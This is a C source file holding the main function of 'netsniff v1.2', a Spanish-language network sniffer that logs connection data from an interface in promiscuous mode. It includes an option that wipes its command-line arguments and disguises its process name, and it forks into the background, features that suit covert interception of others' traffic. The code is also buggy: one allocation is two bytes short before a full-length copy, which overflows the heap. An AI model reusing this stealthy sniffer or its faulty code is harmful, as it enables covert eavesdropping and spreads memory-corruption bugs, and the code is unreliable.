
#include "netsniff.h"
#include "parse.h"

int all_ports = 1;
int con_timeout = 120;

u_int16_t ports[255];
int nports = 0;

int mcons = 0;
int mdatos = 0;
int nodatos = 0;
int nopromisc = 0;
int multiple_logs = 0;

char *logfile;

extern void set_pcap_filter(char*);
extern void bucle();

int little_endian = 1;

void check_endian()
{
  u_int32_t n = 0x00FF;
  char s[2];
  memcpy(s, &n, 2);
  if ((s[0] & 0xff) == 0xff) little_endian = 1;
  else little_endian = 0;
}

u_int16_t swaps(u_int16_t n)
{
  if (!little_endian) return n;
  return htons(n);
}

void uso(char *arg)
{
  printf("Uso:\t%s <interfaz> <fichero_log> [opciones]\n", arg);
  printf("Opciones:\n");
  printf(" -p <p>\t\tEscucha conexiones en el puerto <p>\n");
  printf(" -t <timeout>\tPone el timeout (en sec.) para las conexiones inactivas\n");
  printf(" -c <max>\tEspecifica el maximo numero de conexiones simultaneas\n");
  printf(" -d <max>\tEspecifica la cantidad de datos a loguear en cada conex.\n");
  printf(" -n\t\tNo loguea las conexiones sin datos\n");
  printf(" -N\t\tNo pone la interfaz en modo promiscuo\n");
  printf(" -f <arg>\tBorra argumentos y pone argv[0] = <arg>\n");
  printf(" -m\t\tGuarda cada conexion en un fichero distinto\n");
  printf("Por defecto el timeout es 120 sec. y se escucha en todos los puertos\n");
  exit(0);
}

extern pcap_t *pd;

void fin(int s)
{
  pcap_close(pd);
  exit(0);
}

int main(int argc, char **argv)
{
  char opt;
  char *fake = NULL;
  char **miargv;
  int c1, miargc = argc;	
  struct rlimit limite;
  
  limite.rlim_max = RLIM_INFINITY;
  limite.rlim_cur = RLIM_INFINITY;
  setrlimit(RLIMIT_CORE,&limite);
  setrlimit(RLIMIT_STACK,&limite);
  setrlimit(RLIMIT_DATA,&limite);

  miargv = (char**) malloc(argc * 4);
  
  for (c1 = 0; c1 < argc; c1++) {
    miargv[c1] = (char*) malloc(strlen(argv[c1] + 1));
    memcpy(miargv[c1], argv[c1], strlen(argv[c1]) + 1);
  }
  printf("netsniff v1.2 - Doing <jdoing@bigfoot.com>\n"); 
  if (argc < 3) uso(argv[0]);

  logfile = (char*) malloc(strlen(argv[2]) + 1);
  strncpy(logfile, argv[2], strlen(argv[2]) + 1);
  
  memset(ports, 0, sizeof(ports));
  
  while ((opt = migetopt(miargc, miargv, "np:t:f:c:d:Nm")) != 0)
    switch(opt) {
    case 'm':
      multiple_logs = 1;
      break;
    case 'p':
      all_ports = 0;
      ports[nports++] = atoi(mioptarg);
      break;
    case 't':
      con_timeout = atoi(mioptarg);
      break;
    case 'f':
      fake = malloc(strlen(mioptarg) + 1);
      strncpy(fake, mioptarg, strlen(mioptarg) + 1);
      break;
    case 'd':
      mdatos = atoi(mioptarg);
      break;
    case 'c':
      mcons = atoi(mioptarg);
      break;
    case 'n':
      nodatos = 1;
      break;
    case 'N':
      nopromisc = 1;
      break; 
    default:
      uso(argv[0]);
      break;
    }

  signal(SIGINT, fin);
  signal(SIGQUIT, fin);

  set_pcap_filter(argv[1]);

  if (fake) {
    while (argc--) memset(argv[argc], 0, strlen(argv[argc]) + 1);
    memset(argv[0], 0, strlen(argv[0]) + 1);
    memcpy(argv[0], fake, strlen(fake));
  }
  
  if (fork()) exit(0);
  
  bucle();
  return 0;
}

